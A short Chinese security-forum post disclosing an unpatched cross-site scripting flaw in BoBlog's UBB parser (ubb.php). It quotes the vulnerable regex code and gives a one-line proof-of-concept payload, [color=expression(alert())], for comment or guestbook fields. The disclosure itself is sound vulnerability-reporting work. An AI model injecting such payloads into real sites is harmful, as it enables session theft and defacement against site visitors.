|
文章作者:lib3rt3
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)&NSSPC
漏洞发现者是lib3rt3,我帮他待发罢了。
BoBlog跨站漏洞
今天抽空看了下Boblog的代码,发现了个跨站漏洞,影响最新版,目前官方没出补丁(呵呵,貌似偶有点不厚道),看下ubb.php的代码:
Copycode
$regubb_search=array(
.......
"/\[color=([^\[\<]+?)\](.+?)\[\/color\]/i",
"/\[font=([^\[\<]+?)\](.+?)\[\/font\]/i",
.......
);
$regubb_replace=array(
.......
"<spanstyle=\"color:\\2\\1;\">\\2</span>",
"<spanstyle=\"font-family:\\2\\1;\">\\2</span>",
.......
);
$str=preg_replace($regubb_search,$regubb_replace,$str);
哈哈,没有对style里的东东过滤,在评论或留言处写:
Copycode
[color=expression(alert())]lib3rt3[/color]
至于跨站的具体利用,我想大家都比我明白:)
PS:那位有时间去通知下官方。
|
当前位置:
